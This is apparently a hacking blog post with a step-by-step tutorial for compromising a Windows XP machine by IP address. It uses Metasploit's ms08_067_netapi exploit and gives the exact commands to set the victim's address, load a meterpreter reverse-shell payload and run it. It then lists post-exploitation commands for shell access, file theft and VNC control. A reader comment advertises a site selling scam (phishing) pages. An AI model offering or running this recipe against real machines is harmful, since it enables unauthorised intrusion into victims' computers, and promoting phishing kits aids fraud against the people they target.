html

Security : How hackers Hack Windows Using IP Address


I already talked about how to get someone IP address, and today i will talk about how to hack windows xp using ip address.
So we gonna use " metasploit ", if you are a windows user, you can download it from here :
Download Metasploit
 But , i advice you to download kali linux, it's the best penetrating testing linux distribution.
After installing metasploit, now you have to run it, after running metasploit you must wait a few minutes.
Now if you see the console line. and if you have the ip address. we can start our job !
first of all, let's select our exploit ( which is ms08_067_netapi ) just copy and paste this command
use exploit/windows/smb/ms08_067_netapi
after using our exploit, now we must set the options. so just write those commands.
The important option is RHOST this is the ip address of  the victime machine. ( replace vic_ip by the victime's ip address )
set RHOST ip_vic
Now, the payload, the payload is that piece of code that runs along with the exploit and provides the hacker with a reverse shell.
set payload windows/meterpreter/reverse_tcp
Now, set the Local host. which is your local ip address.
set LHOST loc_ip
The last option is setting the local port.
set LPORT 445
then write:


exploit
If the exploit was succeed, now you will see a command line called " meterpreter > " here you can control your victime easily by typing some commands like :
Start Windows Shell : shell
Browsing file system : there are many commands like cat, upload, download ...
Start VNC : run vns
You can browse more commands on google for further information.
Previous
Next Post »

1 comments:

Write comments
JACK Lee
AUTHOR
November 30, 2020 at 6:58 AM delete

for scama pages visit
https://www.fudsender.com/

Reply
avatar